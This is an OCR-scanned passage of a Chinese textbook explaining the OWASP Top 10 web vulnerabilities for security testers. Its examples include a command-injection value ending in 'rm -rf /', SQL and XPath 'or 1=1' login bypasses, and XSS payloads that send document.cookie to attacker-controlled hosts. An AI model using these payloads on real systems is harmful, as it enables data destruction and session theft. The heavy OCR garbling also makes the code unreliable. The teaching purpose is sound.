的 数据 作为 命令 或 者 查询 语句 的 一 部 分 被 发 送 给 解释 器 的 时 候 。 攻 击 者 发 送 的 恶意 
数据 可 以 欺骗 解释 器 ， 以 执行 计划 外 的 命令 或 者 在 未 被 恰当 授权 时 访问 数据 。 

。 A2- 失 效 的 身份 认证 和 会 话 管理 : 与 身份 认证 和 会 话 管理 相关 的 应 用 程序 的 功能 往往 
得 不 到 正确 的 实现 ， 这 就 导致 了 攻击 者 破坏 密码 、 密 钥 、 会 话 令 牌 或 攻击 其 他 的 漏 
洞 去 冒充 其 他 用 户 的 身份 。 

。 A3- 跨 站 脚本 CXSS); 当 应 用 程序 收 到 不 可 信和 的 数据 ， 在 没有 进行 适当 验证 和 转 义 的 
情况 下 ， 就 将 它 发 送 给 一 个 网 页 浏览 器 ， 这 就 会 产生 跨 站 脚本 攻击 (简称 XSS)。XSS 
允许 攻击 者 在 受害 者 的 浏览 器 上 执行 脚本 ， 从 而 劫持 用 户 会 话 、 危 害 网 站 ， 或 者 将 

用 户 转向 至 恶意 网 站 。 

。 A4- 不 安全 的 直接 对 象 引 用 : 当 开发 人 员 暴 露 一 个 对 内 部 实现 对 象 的 引用 时 ， 例 如 ， 

一 个 文件 、 目 录 或 者 数据 库 密 钥 ， 就 会 产生 一 个 不 安全 的 直接 对 象 引 用 。 在 没有 访 

问 控制 检测 或 其 他 保护 时 ， 攻 击 者 会 操控 这 些 引 用 去 访问 未 授权 数据 。 

。 AS- 安 全 配置 错误 : 好 的 安全 需要 对 应 用 程序 、 框 架 、 应 用 程序 服务 器 、Web 服务 器 、 

数据 库 服 务 器 以 及 平台 定义 执行 安全 配置 。 由 于 许多 设置 的 默认 值 并 不 是 安全 的 ， 

因此 ， 必 须 定义 、 实 施 和 维护 这 些 设 置 。 这 包含 了 对 所 有 的 软件 保持 及 时 更 新 ， 包 

括 所 有 应 用 程序 的 库 文件 。 

。 A6- 敏 感 信 息 泄露 :许多 Web 应 用 程序 没有 正确 保护 敏感 数据 ， 如 信用 卡 、 税 务 ID 
和 身份 证 凭据 。 攻 击 者 可 能 会 窃取 或 算 改 这 些 弱 保护 的 数据 以 进行 信用 卡 诈骗 、 身 
份 窃取 或 其 他 犯罪 。 敏 感 数据 值 需要 额外 的 保护 ， 比 如 在 存放 或 在 传输 过 程 中 的 加 
密 ， 以 及 与 浏览 器 交换 时 进行 特殊 的 预防 措施 。 

。 A7- 功 能 级 访问 控制 缺失 ， 大 多 数 Web 应 用 程序 在 功能 在 UI 中 可 见 以 前 ， 验 证 功能 
级 别 的 访问 权限 。 但 是 ， 应 用 程序 需要 在 每 个 功能 被 访问 时 在 服务 器 端 执行 相同 的 


第 7 章 ”软件 安全 动态 渗透 *279* 


访问 控制 检查 。 如 果 请 求 没有 被 验证 ， 攻 击 者 能 够 伪造 请 求 以 在 未 经 适当 授权 时 访 
问 功能 。 

。 AS8- 跨 站 请 求 伪造 (CSRF): 一 个 跨 站 请 求 伪造 攻击 迫使 登录 用 户 的 浏览 器 将 伪造 的 
HTTP 请 求 , 包括 该 用 户 的 会 话 Cookie 和 其 他 认证 信息 , 发 送 到 一 个 存在 漏洞 的 Web 
应 用 程序 。 这 就 允许 攻击 者 迫使 用 户 浏览 器 向 存在 漏洞 的 应 用 程序 发 送 请 求 ， 而 这 
些 请 求 会 被 应 用 程序 认为 是 用 户 的 合法 请 求 。 

。 A9- 使 用 含有 已 知 漏洞 的 组 件 : 组 件 ， 比 如 : 库 文件 、 框 架 和 其 他 软件 模块 ， 几 乎 总 
是 以 全 部 的 权限 运行 。 如 果 一 个 带 有 漏洞 的 组 件 被 利用 ， 这 种 攻击 可 以 造成 更 为 严 
重 的 数据 丢失 或 服务 器 接管 。 应 用 程序 使 用 带 有 已 知 漏洞 的 组 件 会 破坏 应 用 程序 防 
御 系 统 ， 并 使 一 系列 可 能 的 攻击 和 影响 成 为 可 能 。 

。 A10- 未 验证 的 重 定向 和 转发 ，Web 应 用 程序 经 常 将 用 户 重 定向 和 转发 到 其 他 网 页 和 
网 站 ， 并 且 利 用 不 可 信 的 数据 去 判定 目的 页 面 。 如 果 没 有 得 到 适当 验证 ， 攻 击 者 可 
以 重 定向 受害 用 户 到 钓鱼 软件 或 恶意 网 站 ， 或 者 使 用 转发 去 访问 未 授权 的 页 面 。 

下 面 我 们 逐一 详细 地 介绍 OWASP Top 10 的 攻击 原理 及 类 型 。 


7.4.4 注入 


注入 是 一 种 常见 的 对 Web 应 用 程序 的 攻击 和 威胁 , 注入 问题 是 当 用 户 提供 的 数据 被 发 送 
给 解释 器 作为 命令 或 者 查询 的 一 部 分 时 发 生 ， 它 是 所 有 解释 型 语言 不 得 不 面 对 的 一 个 具有 挑 
战 性 问题 。 

目前 注入 问题 非常 流行 , 经 常 被 利用 于 SQL 查询 、LDAP 查询 、XPath 查询 和 操作 系统 
命令 以 及 解释 器 中 。 根 据 注入 问题 产生 的 原因 和 背景 环境 ， 注 入 可 分 为 很 多 种 类 型 OS 命 
令 注 入 、XPath EA. LDAP 注入 、SQL 注入 、XQuery 注入 、SSI 注 入、XML 注入 等 。 在 这 
里 主要 介绍 几 种 常见 的 注入 问题 ，OS 命令 注入 、XPath 注入 、LDAP 注入 和 SQL 注 入。 

* OS 命令 注入 

OS 指令 执行 是 为 了 通过 网 络 接口 在 Web 服务 器 执行 OS 命令 的 一 种 技术 。 如 果 应 用 程 
序 使 用 外 部 输入 的 字符 串 或 者 受 外 部 影响 的 字符 串 组 装 命令 ， 并 且 ， 没 有 经 过 正确 的 过 滤 ， 
就 可 能 会 导致 OS 命令 注入 的 攻击 。 

例如 : 通过 参数 注入 命令 

下 面 是 一 段 PHP 代码 。PHP 提供 了 3 个 可 以 执行 外 部 命令 的 函数 :system()、exec0、 
passthru0， 同 时 ，PHP 还 提供 了 popen 通过 打开 一 个 进程 管道 来 执行 给 定 的 命令 ， 不 过 必须 
有 root 权限 ， 这 里 以 system. 为 例 : 

$userName=$ POST ("user"); 


$command-'ls -1 /home'. $userName; 
System ($command); 


如 果 用 户 没有 进行 输入 验证 ， 一 个 恶意 的 用 户 输入 Susemame， 如 下 : 


rm -rf / 


那么 ，$command 的 结果 为 : 
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Ls -1 /home/;rm -rf / 


由 于 分 号 “; ”在 Linux 和 UNIX 系统 下 是 命令 的 分 隔 符 ， 系 统 会 首先 执行 k 命令 ， 然 
后 执行 m 命令 ， 删 除 整个 系统 文件 。 

e XPath 注入 

现在 XML 技术 被 广泛 使 用 ， 并 开始 出 现 针对 XML 数据 信息 的 XPath 注入 攻击 技术 。 
XPath 是 XML 路 径 语言 , 是 一 种 用 来 确定 XML 文档 中 某 部 分 位 置 的 语言 。XPath 基于 XML 
的 树 状 结构 ， 提 供 在 数据 结构 树 中 寻找 节点 的 能 力 。 

XPath 1.0 定义 了 4 种 数据 类 型 ， 节 点 型 、 字 符 串 型 、 数 字 型 与 布尔 型 。 有 效 的 运算 符 
如 下 : 

A, f. // 以 及 … 运 算 符 ， 一 般 用 于 轴 描 述 

B、 合 集运 算 符 | 把 两 个 节点 形成 联 集 

C. 布尔 运算 符 and、or 以 及 not0 函 数 

D、 数 学 运算 符 +、-、*、div 以 及 mod 


E、 比 较 操 作 =、! — < >, >, < 
如 表 7-6 所 示 是 部 分 XPath 特殊 意义 字符 表 。 
表 7-6 XPath 特殊 意义 字符 表 
字 符 描 o x 5 T 
用 “/” 开 始 的 路 径 代表 元 素 的 绝对 路 径 /Employees/Employee 表示 选择 元 素 
mployee 中 的 所 有 Employee 元 素 
不 用 “/” 开 始 的 路 径 代表 元 素 的 相对 路 径 Employee/FirstName 表示 当前 路 径 下 的 所 
有 Employee 的 FirstName 
// 从 匹配 选择 的 当前 节点 选择 文档 中 的 节 //Employee 代表 所 有 的 Employee 元 素 
点 ， 而 不 考虑 它们 的 位 置 
表示 当前 节点 
表示 当前 节点 的 父 节 点 //Type[name(..) Employee] é zi: Type 
元 素 ， 并 且 Type 的 父 元 素 是 Employee 
可 用 于 选择 未 知 XML 元 素 /EmployeesyEmployee/# 表 示 元 素 
Employee 中 的 所 有 Employee 元 素 的 子 元 素 
0 指定 特定 的 元 素 /Employees/Employee[1] 表 示 元 素 
Employees 中 的 第 一 个 Employee 的 子 元 素 
| 在 XPath 表达 式 中 ， 使 用 “|” 运 算 符 可 /fFirstName|//LastName 表示 从 文档 中 选 
以 选择 几 个 路 径 择 所 有 FirstName fll LastName 元 素 
ü 选取 属性 //@id 表示 选取 所 有 名 为 id 的 属性 
例如 : 需要 Alex 登录 时 的 XPath 语句 如 下 : 


//Employee[UserName/text ()-'alexw'and Password/text ()-'alexwang'] 
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如 果 用 户 输入 的 FirstName 是 : 'alexw'or 1=1 or'a='a' 和 那么 ， 查 询 语句 就 会 变 成 为 ; 

//Employee[Username/text ()-'alexw'orl-lor'a'-'a'and 
Password/text ()-'alexwang'] 

这 个 语句 中 ， 由 于 or 171 已 经 使 得 整个 语句 的 结果 为 tue， 所 以 ， 关 于 Password 的 判 
断 已 经 不 重要 了 。 

* LDAP 注入 

LDAP 是 轻型 目录 访问 协议 , LDAP 目录 的 条 目 (entry) 由 属性 (attribute) 的 一 个 聚集 组 成 ， 
并 由 一 个 唯一 性 的 名 字 引 用 ， 即 专 有 名 称 (distinguished name，DN)。 例如， DN 能 取 这 样 的 
值 :“ou=groups,ou=people,dc=wikipedia,dc=org”。 


dc=org 

| dc=wikipedia 

EN 

ou=people ou=groups 

例如 ，mail EEEE IE “user@example.com”; jpegPhotos 属性 一 般 包 含 JPEG/JFIF 格 
式 的 图 片 。 

LDAP 目录 条 目 可 描述 一 个 层次 结构 ， 这 个 结构 可 以 反映 一 个 政治 、 地 理 或 者 组 织 的 范 
畴 。 在 原始 的 X.500 模型 中 ， 反 映 国家 的 LDAP 目录 与 普通 数据 库 的 主要 不 同 之 处 在 于 数据 
的 组 织 方式 ， 它 是 一 种 有 层次 的 树 型 结构 。 所 有 条 目的 属性 的 定义 是 对 象 类 object class 的 组 
成 部 分 ， 并 组 成 在 一 起 构成 schema; 那些 在 组 织 内 代表 个 人 的 schema 被 命名 为 white pages 
schema。 数 据 库 内 的 每 个 条 目 都 与 若干 对 象 类 联系 ， 而 这 些 对象 类 决定 了 一 个 属性 是 否 为 可 
选 和 它 保存 哪些 类 型 的 信息 。 属性 的 名 字 一 般 是 一 个 易于 记忆 的 字符 串 , 例如 用 cn 为 通用 名 
(common name) 命 名 ， 而 "mail" 代 表 e-mail 地 址 。 属 性 取 值 依赖 于 其 类 型 ,并且 LDAPv3 中 一 
般 非 二 进 制 值 都 遵从 UTF-8 字符 串 语法 ， 典 型 的 LDAP 配置 使 用 DNS 名 称 作为 树 型 结构 的 
顶端 ， 下 列 是 代表 人 、 文 档 、 组 织 单元 、 打 印 机 和 其 他 任何 事务 的 条 目 。 

例如 : Find("cn=Alex&userPassword=mypass") 会 被 解析 为 如 下 : Find("(&(cn=Alex) 
(userPassword-mypass)) ") 

。 SQL 注 入 

SQL 攻击 是 发 生 在 应 用 程序 和 数据 库 层 之 间 的 安全 漏洞 。 所 有 支持 SQL 语言 标准 的 数 
据 库 软件 都 可 能 受到 该 攻击 。 下 面 举 一 个 最 经 典 的 登录 网 站 的 例子 : 

String username-request.getParameter ("username"); 

String password-request.getParameter ("password"); 

String query = "SELECT ID FROM USERS WHERE username-" + username + " "AND 
password-"- password; 

Statement stmt = con.createStatement (query); ResultSet rs = 


stmt.executeQuery (query); 
If (rs.next()) 


t 
// 登 录 成 功 


H 
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Else 
t 
// 登 录 失 败 


} 


假设 一 个 名 叫 alex 的 用 户 的 密码 是 123456789， 那 么 登录 时 ， 形 成 的 SQL 语句 如 下 : 
SELECT ID FROM USERS WHERE usemame='alex' AND password-'123456789'。 到 目前 为 止 ， 
一 切 都 很 好 。 用 户 也 可 以 登录 成 功 ， 但 是 ， 若 用 户 的 输入 变 成 alex' or 1=1，SQL 会 变 成 如 下 : 


SELECT ID FROM USERS WHERE username-'alex'or 1-1 AND password='123456789' 


此 时 ， 用 户 输入 的 用 户 名 和 密码 是 否 正确 已 经 不 重要 ， 因 为 该 SQL 将 变 为 一 个 恒 等 的 


SQL 命令 , 这 便 是 SQL 注入 。 以 上 我 们 介绍 了 常见 的 注入 漏洞 及 


对 应 用 程序 危害 极 大 ， 在 应 用 程序 中 应 该 尽 可 能 地 避免 注入 漏洞 。 
74.5 ”失效 的 身份 认证 和 会 话 管理 
在 安全 领域 中 ， 有 两 个 非常 重要 的 概念 


Authentication 说 明 你 是 谁 ， Authorization 说 明 你 可 以 干什么 ? 在 当 


的 身份 认证 方式 就 是 用 户 名 加 密码 的 方式 。 
。 会 话 管理 


让 我 们 看 一 个 最 常见 的 例子 一 一 会 话 动 持 ， 如 图 7-2 所 示 : 


2 GET viewprofiejsp?sessionid=1234567 


PEE 


M 


2 GET viewprofiejsp?sessionid=1234567 " 
— 


其 几 种 常见 的 类 型 ， 注 入 


身份 验证 (Authentication) 和 授权 (Authorization)。 
今 的 网 络 应 用 中 , 最 常见 


> 


3 


图 7-2 会 话 动 持 示 例 


如 图 7-2 所 示 ， 用 户 正 常 浏览 网 站 ， 此 时 他 的 sessionid 为 1234567， 攻 击 者 通过 网 络 
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嗅 探 器 获得 了 用 户 的 sessionid， 这 样 他 就 可 以 模仿 用 户 进行 登录 和 操作 了 ， 而 此 时 用 户 毫 无 


所 知 ， 这 就 是 最 常见 的 会 话 劫持 。 
我 们 可 以 通过 以 下 方式 判断 是 否 应 用 程序 存在 会 话 劫持 漏洞 : 
A. 用 户 身份 验证 凭证 没有 使 用 哈 希 或 加 密 保护 
B. 认证 凭证 可 以 猜测 
. AW ID 暴露 在 URL 中 
. i ID 没有 超时 限制 
. 密码 、 会 话 ID 和 其 他 认证 凭证 使 用 未 加 密 传 输 方 式 
身份 认证 


emuon 


这 些 年 ， 我 们 的 电 商 发 展 得 如 火 如 茶 ， 是 因为 我 们 现在 的 网 上 支付 系统 的 安全 性 大 大 提 
高 了 ， 比 如 我 们 都 熟知 的 口 盾 。 此 外 ，Google 公司 推出 的 Google Authenticator 也 是 一 个 
典型 的 双 因 子 的 身份 验证 ， 用 户 登录 时 ， 除 了 要 输入 用 户 名 和 密码 以 外 ， 还 需要 输入 一 个 


动态 码 。 


身份 认证 和 会 话 动 持 相 比 , 主要 可 以 通过 加 强 认 证 机 制 来 提高 安全 程度 , 例如 密码 长 度 、 


复杂 度 等 策略 。 身 份 认 证 和 密码 管理 可 以 在 测试 过 程 中 重点 检查 如 下 项 目 : 
A. 除了 那些 公开 的 内 容 以 外 ， 对 所 有 网 页 和 资源 要 求 身份 验证 
B. 如 果 你 的 应 用 程序 管理 存储 了 机 密 信息 ， 那 么 应 该 对 这 些 信息 进行 加 密 
C. 身份 验证 的 失败 响应 应 当 不 提示 哪 部 分 错误 
D. 用 户 访问 程序 以 外 服务 的 身份 验证 信息 应 当 加 密 
E. 建议 使 用 HTTPS 传输 身份 信息 
F. 通过 策略 加 强 密 码 强度 和 复杂 度 
G 当 无 效 登 录 次 数 达 到 了 一 定数 时 ， 强 制 执行 账户 锁定 
H. 临时 密码 需要 设置 有 效 期 
L 当 密码 重 置 需要 通知 用 户 
J. 对 密码 框 禁 用 “ 记 住 我 ”。 


7.4.6” 跨 站 脚本 攻击 


跨 站 脚本 攻击 (Cross Site Scripting，XSS) 是 一 种 网 站 应 用 程序 的 安全 漏洞 攻击 ， 是 脚本 


代码 注入 的 一 种 。 这 类 攻击 通常 通过 注入 HIML 或 者 Javascript、VBScript 脚本 发 动 攻击 


Ho 


攻击 成 功 后 , 攻击 者 可 能 得 到 私密 网 页 内 容 和 Cookie 等 各 种 内 容 。 很 多 知名 网 站 曾经 都 受到 
这 种 攻击 ， 例 如 Yahoo、 新 浪 微 博 等 。 最 近 几 年 KSS 攻击 已 经 超过 缓冲 区 溢出 攻击 ， 成 为 最 


流行 的 攻击 方式 。 


KSS 漏洞 往往 是 由 于 程序 中 未 对 一 些 关键 字 进 行 转 义 导致 的 , 而 这 些 文档 往往 出 现在 一 


些 脚本 语言 中 ， 让 我 们 看 下 边 这 个 例子 : 
应 用 程序 在 下 面 HTML 代码 的 构建 中 使 用 未 经 过 验证 或 者 转 义 的 数据 : 


(String) page +="<input name-'creditcard'type-'TEXT' value=" 
"«request.getParameter ("CC")«"'»"; 
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攻击 者 在 浏览 器 中 修改 “CC" 参 数 为 如 下 : 


'»«script»document.locakon- 'hWp://www.aNacker.com/cgi-- -bin/cookie.cgi? 
foo-'-«document.cookie«/script»'. 


这 导致 受害 者 的 会 话 ID 被 发 送 到 攻击 者 的 网 站 ， 使 得 攻击 者 能 够 劫持 用 户 当前 会 话 。 

目前 ，XSS 主要 分 为 3 类 ， 反 射 式 XSS、 存 储 式 XSS 和 基于 DOM 的 XSS。 下 面 
介绍 一 下 反射 式 和 存储 式 XSS。 

反射 式 XSS 也 称 为 非 永久 性 XSS， 是 目前 最 流行 的 一 种 KSS 攻击 。 它 经 常 出 现在 服 
务 器 直接 使 用 客户 端 提 供 的 数据 ， 而 且 没 有 对 数据 进行 无 害 化 处 理 。 由 于 HTML 文档 是 一 
个 扁平 的 连续 结构 ， 同 时 其 中 还 有 一 些 控制 语句 ， 那 么 如 果 客 户 提交 的 数据 没有 经 过 正确 的 
HTML 编码 而 直接 使 用 ， 就 可 能 导致 脚本 注入 。 

。 反射 式 XSS 

反射 式 XSS 如 图 7-3 所 示 。 


www.bobsite.com 


图 7-3 反射 式 XSS 


a) Alice 经 常 访问 网 站 www.buybook.com，Alice 有 登录 www.buybook.com 的 用 户 名 、 密 
码 ， 而 且 还 存储 了 一 些 敏感 数据 ， 如 支付 信息 。 

b) Bob 发 现 www.buybook.com 有 反射 式 KSS 漏洞 。 他 就 构造 一 个 利用 这 个 KSS 漏洞 
的 URL, 并 且 通 过 邮件 发 送 给 Alice. 引诱 Alice 点 击 这 个 URL 来 访问 www.buybook.com。 

c)Alice 访问 Bob 提供 的 URL 并 且 登 录 到 www.buybook.com。 

d) www.buybook.com 返 回 结果 给 Alice， 其 中 含有 嵌入 的 恶意 JavaScript 代码 。 

e) 恶意 代码 会 在 Alice 的 浏览 器 中 执行 ， 它 可 以 将 Alice 的 会 话 Cookie 发 送 给 Bob 

控制 的 站 点 www.bobsite.com。 

f) Bob 可 以 从 网 站 www.bobsite.com 得 到 Alice 的 会 话 Cookie. 

g)Bob 使 用 这 个 会 话 Cookie 在 Alice 不 知情 的 情况 下 盗 取 Alice 的 敏感 信息 。 

。 存储 式 XSS 

也 称 为 永久 性 的 XSS， 它 的 危害 更 大 。 典 型 的 例子 就 是 在 交友 网 站 上 ， 如 果 一 个 人 在 自 
己 的 信息 上 写 上 一 段 脚 本 ， 如 “自我 介绍 <Script>window.open(http://wwwmysite.com?yourcookie 
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document.cookie)</Script>)”， 而 这 个 网 站 没有 对 自我 介绍 的 内 容 进行 正确 的 编码 。 当 用 户 浏 
览 该 信息 的 时 候 ， 就 会 导致 用 户 信息 泄 露 。 
。 XSS 检测 方法 
XSS 检测 方法 大 致 分 为 两 类 : 手工 检测 和 全 自动 检测 。 手工 检测 方式 如 下 : 在 HTML 用 
户 交 互 界面 可 输入 <Script>alert(“Test”)</Script>, 若 出 现 提示 框 , 说 明 应 用 存在 KSS 注入 漏洞 。 
e JEF DOM 的 XSS 
基于 DOM 的 XSS 是 一 种 基于 网 页 DOM 结构 的 攻击 , 该 攻击 特点 是 中 招 的 人 是 少数 人 。 
举例 : 页 面 某 些 内 容 是 根据 url 中 的 一 个 叫 “content” 的 参数 直接 显示 的 : 
«$8 page language-"java"contentType-"text/html; 
charset-UTF-8"pageEncoding-"UTF-8"$» 
X«!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 
Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"» 
«html» 
<head> 
«title»XSS 测试 </title> 
</head> 
«body» 
页 面 内 容 : «$-request.getParameter ("content") $» 
</body> 
</html> 


攻击 者 做 一 个 超 链 接 发 给 受害 人 ， 超 链接 地 址 为 ，http://www.hope-pact.com?conten 人 = 
<script>window.open(“www.kk.com?param 一 ”+document.cookie)</script>， 当 受害 人 点 击 这 个 
链接 时 (假设 他 已 经 登录 www.hope-pact.com), 浏览 器 就 会 直接 打开 kk.com, 并 且 把 受害 人 在 
www.hope-pact.com 中 的 cookie 信息 发 送 到 kk.com, kk.com 是 攻击 者 搭建 的 网 站 ， 当 攻击 者 
的 网 站 接收 到 该 信息 时 , 攻击 者 就 盗 取 了 受害 人 在 www.hope-pact.com 的 cookie 信息 , cookie 
信息 中 可 能 存 有 登录 密码 ， 攻 击 成 功 ! 这 个 过 程 中 ， 受 害 者 只 有 受害 人 自己 。 


74.7 不 安全 的 直接 对 象 引 用 


直接 对 象 引用 也 是 访问 控制 的 一 个 部 分 ， 之 所 以 单独 列 出 来 ， 也 是 因为 它 的 危害 比较 严 
重 ， 首 先 我 们 先 介绍 一 下 什么 是 直接 对 象 引用 。 

直接 对 象 引用 也 就 是 DOR， 是 Direct Object Reference 的 简称 ， 是 指 开发 者 将 文件 、 路 
径 、 数 据 库 记录 或 者 Key 作为 URL 或 表单 的 一 部 分 ， 暴 露 给 用 户 一 个 引用 。 攻 击 者 能 够 操 
作 直接 对 象 引用 去 访问 一 些 他 没有 权限 的 其 他 对 象 ， 除 非 访问 控制 被 恰如其分 地 检查 。 

所 谓 的 不 安全 的 直接 对 象 引 用 ， 也 就 是 说 ， 在 引用 对 象 时 ， 访 问 控制 没有 做 好 ， 以 至 于 
某 些 用 户 可 以 超越 限制 ， 访 问 他 不 应 该 访问 的 信息 。 因 为 是 程序 的 漏洞 导致 ， 对 于 网 站 来 说 
这 不 是 什么 异常 行为 ， 这 个 过 程 也 很 难 被 主动 监测 到 ， 除 非 查看 或 者 检测 日 志 ， 由 于 访问 信 
息 对 于 系统 来 说 不 是 什么 有 害 的 操作 。 甚 至 ， 有 的 产品 没有 对 修改 或 者 删除 操作 记录 日 志 ， 
这 就 加 大 了 检测 的 难度 。 倒 是 一 些 漏洞 报告 网 站 帮 了 它 ， 可 以 及 时 反馈 这 样 的 一 些 攻 击 。 

下 面 用 一 个 具体 的 例子 进一步 介绍 一 下 直接 对 象 引用 。 

每 个 系统 都 有 用 户 ， 而 这 些 信息 往往 都 存储 在 数据 库 中 ， 可 能 会 如 表 7-7 所 示 : 
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表 7-7 ”数据 库 中 的 用 户 表 ( 示 例 ) 
UserName FirstName LastName 


在 用 户 这 个 表 中 会 记录 用 户 的 一 些 主要 信息 ， 还 有 可 能 会 有 一 个 表 记 录 一 些 细节 信息 。 
在 用 户 要 查看 自己 的 信息 时 ， 如 何 才能 识别 这 个 用 户 呢 ?通过 姓名 ， 显 然 是 不 可 以 的 ， 因 为 
生活 中 重 名 的 人 太 多 了 ， 不 能 够 通过 姓名 唯一 标识 一 个 用 户 ， 通 过 注册 的 用 户 名 访问 可 以 唯 
一 标识 一 个 用 户 ， 但 这 样 又 暴露 了 一 个 用 户 的 用 户 名 在 URL 或 者 表单 里 面 。 所 以 ， 一 般 的 
程序 都 是 用 ID 来 访问 用 户 信息 ， 因 为 数据 库 记录 中 ， 每 一 条 记录 都 会 有 一 个 不 同 的 ID, 
用 它 不 会 暴露 用 户 的 任何 信息 ， 所 以 这 个 访问 URL 可 能 会 这 样 : 


http://www.example.com/userinfo.do?ID-2 


这 个 链接 看 起 来 没有 任何 问题 ， 他 也 可 以 正常 访问 到 brucexia 的 信息 ， 但 是 ， 如 果 用 
户 人 为 地 修改 该 地 址 为 : 

http://www.example.com/userinfo.do?ID-1 

以 上 URL 访问 会 发 生 什 么 ? 若 不 出 意外 ， 这 样 可 能 就 会 泄露 alexwang 的 信息 ， 而 这 
个 信息 的 泄露 是 因为 用 户 直接 访问 数据 库 对 象 所 导致 的 , 这 便 是 一 个 不 安全 的 直接 对 象 引 用 。 
若 要 防范 这 个 问题 ， 可 以 对 ID 信息 进行 编码 ， 让 用 户 无 法 直接 看 出 系统 对 象 引用 方式 ， 例 
如 修改 为 如 下 : 

http://www.example.com/userinfo.do?ID=DWEFJOJKSDNFMSDNFKDFSKLFJK 

这 便 是 不 安全 直接 对 象 访问 , 接 下 来 让 我 们 简单 了 解 一 下 如 何 防范 和 预防 不 安全 直接 对 
象 访问 ， 通常 有 3 种 方法 : 

1. 使 唯一 标识 变 得 稀疏 ， 难 以 猜测 ， 例 如 : 


http://www.example.com/userinfo.do?ID-DWEFJOJKSDNFMSDNFKDFSKLFJK 


2. 不 让 客户 端 通过 唯一 标识 直接 访问 对 象 ; 

3. 继续 使 用 唯一 标识 直接 访问 对 象 ， 但 加 入 访问 控制 权限 。 
748 安全 配置 错误 

安全 配置 错误 通常 是 指 我 们 的 应 用 程序 往往 需要 用 到 各 种 软件 ， 而 这 些 软件 都 有 一 些 自 
己 特有 的 配置 项 、 默 认 用 户 名 、 密 码 等 信息 。 若 这 些 典 型 的 配置 信息 没有 进行 修改 ， 可 能 会 


给 我 们 的 应 用 程序 带 来 一 定 的 安全 隐患 ， 我 们 可 以 通过 如 下 列表 来 帮助 我 们 分 析 是 否 存在 安 
全 配置 错误 : 
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1) 是 否 有 软件 没有 被 及 时 更 新 ? 

2) 是 否 使 用 或 安装 了 不 必要 的 功能 例如， 端口、 服务 、 网 页 )? 

3) 默认 账户 的 密码 是 否 仍 然 可 用 或 没有 更 改 ? 

4) 你 的 错误 处 理 设置 是 否 防止 堆栈 跟踪 和 其 他 含有 大 量 信息 的 错误 信息 被 泄露 ? 

5) 你 的 开发 框架 和 库 文件 的 安全 设置 是 否 理解 正确 并 配置 恰当 ? 

攻击 案例 : 

1) 案例 #1: 应 用 程序 服务 器 管理 员 控 制 台 自动 安装 后 没有 被 删除 , 而 默认 账户 也 没有 被 
改变 。 攻 击 者 在 你 的 服务 器 上 发 现 了 标准 的 管理 员 页 面 ， 通 过 默认 密码 登录 ， 从 而 接管 了 你 
的 服务 器 。 

2) RAA: 应 用 服务 器 配置 允许 堆栈 跟踪 返回 给 用 户 , 这 样 就 暴露 了 潜在 的 漏洞 ， 攻击 
者 热衷 于 收集 错误 信息 里 提供 的 额外 信息 。 


7.4.9 ”敏感 信息 泄露 


敏感 信息 泄露 属于 一 个 综合 的 范畴 ， 我 们 通常 所 说 的 敏感 信息 包括 用 户 名 、 密 码 、 用 户 
会 话 以 及 其 他 一 些 重要 信息 ， 在 敏感 信息 泄露 中 有 可 能 通过 网 络 ， 可 能 通过 系统 而 泄露 ， 对 
于 这 些 敏感 信息 从 安全 的 角度 ， 我 们 通常 需要 确保 以 下 一 些 内 容 : 

1) 当 这 些 数据 被 长 期 存储 时 ,无 论 存储 在 哪里 ,他 们 是 否 都 被 加 密 ， 特 别 是 对 这 些 数 据 
的 备份 ? 

2) 无 论 内 部 数据 还 是 外 部 数据 , 传输 时 是 否 是 明文 传输 ? 在 互联 网 中 传输 明文 数据 是 非 
常 危险 的 。 

3) 是 否 还 在 使 用 任何 旧 的 或 脆弱 的 加 密 算法 ? 

4) 加 密 密 钥 的 生成 是 否 是 脆弱 的 ， 或 者 缺少 恰当 的 密 钥 管理 或 缺少 密 钥 回 传 ? 

5) 当 浏 览 器 接收 或 发 送 敏感 数据 时 ， 是 否 有 浏览 器 安全 指令 或 头 文件 丢失 ? 

防止 方式 : 

1) 预测 一 些 威胁 ， 加 密 这 些 数 据 的 存储 以 确保 免 受 这 些 威胁 。 

2) 对 于 没 必要 存放 的 、 重 要 的 敏感 数据 ， 应 当 尽 快 清除 。 

3) 确保 使 用 了 合适 的 强大 的 标准 算法 和 强大 的 密 钥 ， 并 且 密 钥 管理 到 位 。 

4) 确保 使 用 密码 专用 算法 存储 密码 ， 例 如 : bcypt. PBKDF2. scrypt. 

5) 禁用 自动 完成 防止 敏感 数据 收集 、 禁 用 包含 敏感 数据 的 缓存 页 面 。 

攻击 案例 : 

RPH: 一 个 应 用 程序 加 密 存 储 在 数据 库 的 信用 卡 信息 ， 以 防止 信用 卡 信息 暴露 给 最 终 
用 户 。 但 是 ， 数 据 库 设置 为 对 信用 卡 表 列 的 查询 进行 自动 解密 ， 这 就 使 得 SQL 注入 漏洞 能 
够 获得 所 有 信用 卡 信息 的 明文 。 该 系统 应 该 被 设置 为 前 端 应 用 程序 使 用 公 钥 对 信用 卡 信息 加 
密 ， 后 端 应 用 程序 只 能 使 用 私 钥 解 密 。 


7.4.10 ”功能 级 访问 控制 缺失 


功能 级 访问 控制 缺失 主要 是 由 于 应 用 系统 在 设计 中 可 能 并 未 考虑 适当 的 访问 控制 ， 可 能 
会 使 得 所 有 用 户 或 者 非法 用 户 可 以 访问 本 不 应 该 他 访问 的 信息 或 者 资源 。 在 实际 中 ， 我 们 可 
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以 如 何 检测 是 否 存 在 访问 漏洞 ? 方法 如 下 : 

1) 用 户 界 面 (UD 是 否 存 在 到 未 授权 功能 的 导航 ? 

2) 服务 器 的 身份 认证 或 授权 功能 是 否 完善 ? 

3) 服务 器 端的 检查 是 否 仅仅 依赖 于 攻击 者 提供 的 信息 ? 以 上 这 些 问题 , 自动 化 工具 不 太 
可 能 发 现 这 些 问题 ， 让 我 们 看 一 个 攻击 的 案例 ; 攻击 者 仅仅 直接 浏览 目标 网 址 ， 例 如 下 面 的 
网 址 需要 身份 验证 ， 同 时 访问 “admin getappinfo* 页 面 还 需要 管理 员 权 限 ，http://example. 
com/app/getappinfohttp://example.com/app/admin getappinfo. 

如 果 未 认证 的 用 户 可 以 访问 上 述 任 一 页 面 ， 这 就 是 漏洞 。 如 果 通 过 验证 的 非 管理 员 用 户 
也 能 允许 访问 “admin_getappinfo” 页 面 ， 这 同样 是 个 漏洞 ， 这 个 漏洞 可 能 会 将 攻击 者 引 向 更 
多 保护 不 当 的 管理 页 面 。 

